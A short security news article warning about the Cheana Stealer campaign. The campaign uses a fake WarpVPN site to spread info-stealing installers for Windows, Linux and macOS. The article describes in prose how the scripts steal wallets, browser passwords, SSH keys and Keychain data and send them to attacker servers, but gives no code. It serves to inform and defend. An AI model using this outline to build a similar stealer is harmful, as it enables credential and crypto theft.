HQ/EMEAFind out how we can help your business
The newly discovered Cheana Stealer malware is the primary weapon for a cybercriminal campaign. Based on reports, this malware uses a phishing site that poses as WarpVPN to deceive users into downloading malicious VPN software for various operating systems.
Researchers uncovered this sophisticated phishing campaign after spotting a VPN phishing website that distributed the virus. Moreover, this campaign sets itself apart from other operations since it can help individuals who use various OS, like Windows, Linux, and macOS.
Phishers execute the Cheana Stealer campaign using a site that spoofs a reputable VPN service.
The website that the Cheana Stealer campaign spoofs is the WarpVPN service, which the actors deliberately designed to urge people to download malicious VPN software. The attackers created separate malware binaries for each targeted OS, allowing them to maximise their attack scope.
For Windows, the virus is distributed using a PowerShell script that runs the install.bat batch file. This script first checks for Python on the victim’s machine, and if it is not present, the campaign can install it along with tools such as pip and virtualenv.
Next, the phishing campaign installs hclockify-win, a malicious Python tool, to steal sensitive information. This software targets crypto browser extensions and standalone wallets, compressing stolen data into a ZIP file and sending it to the attackers’ C2 servers. It also harvests stored browser passwords from Firefox and Chromium-based browsers.
On Linux systems, the Cheana Stealer is distributed using the curl command, which downloads a script called install-linux.sh. This script retrieves a unique ID for tracking and harvesting sensitive information, such as browser data, crypto wallet details, and SSH keys. The last method of this process also transfers that stolen data to an attacker-controlled website.
For macOS, users deliver the malware via a script called install.sh. The script deceives users into providing their credentials through fake prompts and then collects browser login data, macOS passwords, and Keychain information. These details are then also forwarded to the attackers’ command-and-control server.
This new malware operates across all platforms, exploiting system flaws and user trust to exfiltrate sensitive data. Therefore, users should be careful when downloading VPN software solutions, especially the earlier-mentioned site, to avoid falling victim to this new phishing campaign.
